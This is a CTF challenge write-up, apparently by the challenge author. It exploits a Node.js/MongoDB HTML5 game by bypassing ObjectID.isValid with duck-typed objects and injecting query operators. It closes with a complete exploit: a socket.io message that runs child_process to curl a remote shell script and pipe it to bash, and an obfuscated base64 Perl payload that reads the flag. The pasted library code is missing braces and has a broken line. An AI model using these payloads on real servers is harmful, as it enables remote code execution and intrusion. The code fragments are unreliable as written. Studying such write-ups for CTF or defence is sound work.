This challenge is temporarily made in the afternoon before the CTF game(From findding bugs to challenges). So there are some rushes in this challenge , please bear with me.
First we can find hint from HTML source code.
It's an open-source HTML5 game.
We can see there is a static file leak vulnerability
app.use('/css',express.static(__dirname + '/css'));
app.use('/js',express.static(__dirname + '/js'));
app.use('/assets',express.static(__dirname + '/assets'));
Now, we need to find a way to get mongodb error.
Only one thing we can control is id, so we can track the ObjectId()
var valid = ObjectID.isValid(id);
ObjectID.isValid = function isValid(id) {
if(id == null) return false;
if(typeof id == 'number') {
return true;
if(typeof id == 'string') {
return id.length == 12 || (id.length == 24 && checkForHexRegExp.test(id));
if(id instanceof ObjectID) {
return true;
if(id instanceof _Buffer) {
return true;
// Duck-Typing detection of ObjectId like objects
if(id.toHexString) {
return == 12 || ( == 24 && checkForHexRegExp.test(;
return false;
Now we can use id = {"id":{"length":12}}
bypass it.
if(!valid && id != null){
throw new Error("Argument passed in must be a single String of 12 bytes or a string of 24 hex characters");
} else if(valid && typeof id == 'string' && id.length == 24 && hasBufferType) {
return new ObjectID(new Buffer(id, 'hex'));
} else if(valid && typeof id == 'string' && id.length == 24) {
return ObjectID.createFromHexString(id);
} else if(id != null && id.length === 12) {
// assume 12 byte string = id;
} else if(id != null && id.toHexString) {
// Duck-typing to support ObjectId from different npm packages
return id;
} else {
throw new Error("Argument passed in must be a single String of 12 bytes or a string of 24 hex characters");
Now , we change our payload to
id = {"length":0,"toHexString":true,"id":{"length":12}},
And then the whole payload will be sent to mongodb server.
MongoDB shell version: 2.6.10
connecting to: test
> db.a.find({"b":{"$gt":1,"c":"d"}})
error: {
"$err" : "Can't canonicalize query: BadValue unknown operator: c",
"code" : 17287
So the whole exploit is
Client.socket.emit('init-world',{new:false,id:{"$in":[1],"require('child_process').exec('/usr/bin/curl host/shell2|bash')":"bbb","length":0,"toHexString":true,"id":{"length":12}},clientTime:"sacsaccsacsac"});
Client.getPlayerID = () => ({ "$gt":1,[`process.chdir('/');socket.emit('aaa');socket.emit(require('child_process').execSync('sh -c \"echo \\\'dXNlIHN0cmljdDsKdXNlIElQQzo6T3BlbjM7CgpteSAkcGlkID0gb3BlbjMoXCpDSExEX0lOLCBcKkNITERfT1VULCBcKkNITERfRVJSLCAnL3JlYWRmbGFnJykgb3IgZGllICJvcGVuMygpIGZhaWxlZCAkISI7CgpteSAkcjsKCiRyID0gPENITERfT1VUPjsKcHJpbnQgIiRyIjsKJHIgPSA8Q0hMRF9PVVQ+OwpwcmludCAiJHIiOwokcj1ldmFsICIkciI7CnByaW50ICIkclxuIjsKcHJpbnQgQ0hMRF9JTiAiJHJcbiI7CiRyID0gPENITERfT1VUPjsKcHJpbnQgIiRyIjsKJHIgPSA8Q0hMRF9PVVQ+OwpwcmludCAiJHIiOw==\\\'|base64 -d | perl \"'));`]:"bb", toHexString: 'aaa', length: 0, id: {length: 12}})